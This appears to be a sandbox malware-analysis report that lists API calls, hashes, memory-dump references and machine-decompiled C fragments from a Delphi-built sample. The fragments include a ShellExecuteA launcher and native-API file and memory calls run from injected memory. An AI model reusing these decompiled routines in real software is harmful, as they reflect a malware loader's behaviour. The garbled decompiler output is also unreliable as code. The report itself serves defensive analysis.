                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
                                                                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction ID: c6bc4c080fc5fa975f8bb2417a4f68ba34bc7cc60baef9af76509d3dfd8a5f6d
                                                                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction Fuzzy Hash: 1F01527A950308BAEB11EB90CD46BEA77ACDB04700F604176BA04F65C0E6B86A54D79D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 730355536-0
                                                                                                                          • Opcode ID: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                                                                          • Instruction ID: d2b02c823ba1647cc84e75737c235603f8a51179c48dc4d6faecaae88e00545b
                                                                                                                          • Opcode Fuzzy Hash: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                                                                          • Instruction Fuzzy Hash: B40184B02043406ED715AF699D0AB1A7BB5F745704F04847FA140BA2E1CBBE54B0CB5F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406520(void* __eax, struct HICON__* __edx) {
                                                                                                                          				void _v32;
                                                                                                                          				void* _v40;
                                                                                                                          				void* _v48;
                                                                                                                          				void* _v52;
                                                                                                                          				void* _t17;
                                                                                                                          				void* _t20;
                                                                                                                          				struct _ICONINFO* _t23;
                                                                                                                          
                                                                                                                          				_t9 = __eax;
                                                                                                                          				_t20 = __eax;
                                                                                                                          				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
                                                                                                                          					E004064E4(__eax);
                                                                                                                          					_t9 = __edx;
                                                                                                                          					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
                                                                                                                          					if(__edx != 0) {
                                                                                                                          						GetIconInfo(__edx, _t23);
                                                                                                                          						GetObjectA(_v40, 0x18,  &_v32);
                                                                                                                          						 *(_t20 + 0x18) = _v40;
                                                                                                                          						_t17 = _v52;
                                                                                                                          						if(_t17 != 0) {
                                                                                                                          							DeleteObject(_t17);
                                                                                                                          						}
                                                                                                                          						_t9 = _v48;
                                                                                                                          						if(_t9 != 0) {
                                                                                                                          							return DeleteObject(_t9);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t9;
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                                                                          • GetIconInfo.USER32(?), ref: 00406540
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406566
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406574
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3133107492-0
                                                                                                                          • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                                                                          • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                                                                                          • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                                                                          • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
                                                                                                                          • GetIconInfo.USER32(?), ref: 0040FFD8
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040FFFE
                                                                                                                          • DeleteObject.GDI32(?), ref: 0041000C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3133107492-0
                                                                                                                          • Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                                                                          • Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
                                                                                                                          • Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                                                                          • Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteIconInfoObject
                                                                                                                          • String ID: ,k@
                                                                                                                          • API String ID: 2689914137-1053005162
                                                                                                                          • Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                                                                          • Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
                                                                                                                          • Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                                                                          • Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				char* _t39;
                                                                                                                          				void* _t40;
                                                                                                                          				void* _t46;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				void* _t61;
                                                                                                                          
                                                                                                                          				_t60 = __esi;
                                                                                                                          				_t59 = __edi;
                                                                                                                          				_t46 = __ecx;
                                                                                                                          				_t45 = __ebx;
                                                                                                                          				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
                                                                                                                          				E00404EEC(_t61 - 0xa240);
                                                                                                                          				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240))));
                                                                                                                          				_push(1);
                                                                                                                          				_push(0);
                                                                                                                          				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);
                                                                                                                          				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
                                                                                                                          				E00405008(_t61 - 0xa250, _t45, _t46);
                                                                                                                          				E004031F4(_t61 - 0xa254, 9, 0x4091b4);
                                                                                                                          				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
                                                                                                                          				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
                                                                                                                          				E004032CC();
                                                                                                                          				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
                                                                                                                          				_t40 =  *0x40a650; // 0x400000
                                                                                                                          				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250));
                                                                                                                          				_pop(_t57);
                                                                                                                          				 *[fs:eax] = _t57;
                                                                                                                          				_push(E00407993);
                                                                                                                          				return E004030B8(_t61 - 0xa25c, 0x14);
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                                                                                            • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                                                                                            • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 2622400689-2758837156
                                                                                                                          • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                                                                          • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                                                                                          • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                                                                          • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
                                                                                                                            • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
                                                                                                                            • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
                                                                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 2622400689-2758837156
                                                                                                                          • Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                                                                          • Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
                                                                                                                          • Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                                                                          • Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          C-Code - Quality: 21%
                                                                                                                          			E00419FCB(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                          				void* _t18;
                                                                                                                          				void* _t28;
                                                                                                                          				void* _t29;
                                                                                                                          				intOrPtr* _t30;
                                                                                                                          				void* _t32;
                                                                                                                          
                                                                                                                          				asm("cvtps2pd xmm2, [ecx+0x55]");
                                                                                                                          				_t13 = _a4;
                                                                                                                          				_t30 = _a4 + 0xc48;
                                                                                                                          				E0041AB20(_t28, _t13, _t30,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                          				_t6 =  &_a32; // 0x414d32
                                                                                                                          				_t12 =  &_a8; // 0x414d32
                                                                                                                          				_t18 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t29, _t32); // executed
                                                                                                                          				return _t18;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 2MA$2MA
                                                                                                                          • API String ID: 2738559852-947276439
                                                                                                                          • Opcode ID: 73bcaf09a2a61078f1d781c27756ca93da96efef112bc5d4b270d463a52e6b7a
                                                                                                                          • Instruction ID: 104f8a14ad246c84b076e6c0995b0dbe01c20c6baf94378359c58f09699a7de8
                                                                                                                          • Opcode Fuzzy Hash: 73bcaf09a2a61078f1d781c27756ca93da96efef112bc5d4b270d463a52e6b7a
                                                                                                                          • Instruction Fuzzy Hash: 98F0EC71204104ABDB04DF99DC51EDB77A9EF8C754F118249BE1D97241D631E811CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00419FD0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                          				void* _t18;
                                                                                                                          				void* _t27;
                                                                                                                          				intOrPtr* _t28;
                                                                                                                          
                                                                                                                          				_t13 = _a4;
                                                                                                                          				_t28 = _a4 + 0xc48;
                                                                                                                          				E0041AB20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                          				_t6 =  &_a32; // 0x414d32
                                                                                                                          				_t12 =  &_a8; // 0x414d32
                                                                                                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                          				return _t18;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 2MA$2MA
                                                                                                                          • API String ID: 2738559852-947276439
                                                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
                                                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00419F74(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                          				long _t23;
                                                                                                                          				void* _t33;
                                                                                                                          
                                                                                                                          				asm("cld");
                                                                                                                          				asm("sbb eax, 0x8b55eba0");
                                                                                                                          				_t17 = _a4;
                                                                                                                          				_t3 = _t17 + 0xc40; // 0xc40
                                                                                                                          				E0041AB20(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                          				_t11 =  &_a20; // 0x414b77
                                                                                                                          				_t23 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                          				return _t23;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 1f282038835892fe2a911355963dae7f061a2992e7c6dfaffda584ea3c3d0ae9
                                                                                                                          • Instruction ID: 958d07229d913f87e4baa3ae89b3a7fbe58ef3a034b199866343c7c2239820d4
                                                                                                                          • Opcode Fuzzy Hash: 1f282038835892fe2a911355963dae7f061a2992e7c6dfaffda584ea3c3d0ae9
                                                                                                                          • Instruction Fuzzy Hash: 0901F2B2204108AFCB08CF88DC95EEB37EAAF8C354F118209FA1DD3240C630E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00419F1A(void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, char _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				long _t21;
                                                                                                                          				void* _t33;
                                                                                                                          
                                                                                                                          				_push(es);
                                                                                                                          				asm("sbb eax, 0x8b55eba0");
                                                                                                                          				_t15 = _v0;
                                                                                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                          				E0041AB20(_t33, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                                                                                                                          				_t11 =  &_a16; // 0x414b77
                                                                                                                          				_t21 = NtCreateFile(_a4, _a8, _a12,  *_t11, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                                                                                                          				return _t21;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 00413d03e9703152796fabcd5b5efe14935391633a0e48a8fd2306b87820dcc4
                                                                                                                          • Instruction ID: 59240f0c24d42f4f4d5e5ce5e836e36d48a0276155dc8ed090b9bdda842d8758
                                                                                                                          • Opcode Fuzzy Hash: 00413d03e9703152796fabcd5b5efe14935391633a0e48a8fd2306b87820dcc4
                                                                                                                          • Instruction Fuzzy Hash: 1801BDB2205108AFDB08CF98DC95EEB37AAAF8C754F158649FA1DD7241C630EC51CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00419F20(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                          				long _t21;
                                                                                                                          				void* _t31;
                                                                                                                          
                                                                                                                          				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                          				E0041AB20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                          				_t11 =  &_a20; // 0x414b77
                                                                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                          				return _t21;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction ID: 918681b749d1ebc684007e4c1563b975095bc633172356dce6c62aeb4b4fe286
                                                                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction Fuzzy Hash: 2DF0B2B2205208ABCB08CF89DC95EEB77ADAF8C754F158249BA0D97241C630F851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E0041A04A(signed char* __ecx) {
                                                                                                                          
                                                                                                                          				asm("movsb");
                                                                                                                          				if (( *__ecx & 0x000000a8) <= 0) goto L3;
                                                                                                                          			}



                                                                                                                          0x0041a04b
                                                                                                                          0x0041a04f

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 1dc51e4a20ad0745621d0a36c88979ec0a75884888b3541c6b291b9879b3a170
                                                                                                                          • Instruction ID: 83811c8ca78a33826bc59e76750f49715a77075c99934890fbc3ac5f4e3f867a
                                                                                                                          • Opcode Fuzzy Hash: 1dc51e4a20ad0745621d0a36c88979ec0a75884888b3541c6b291b9879b3a170
                                                                                                                          • Instruction Fuzzy Hash: 41F05476204214AFD710EF98DC40EE777A9EF8C324F14855AFA5C9B241C631E911C7A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A100(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                          				long _t14;
                                                                                                                          				void* _t21;
                                                                                                                          
                                                                                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                          				E0041AB20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                          				return _t14;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
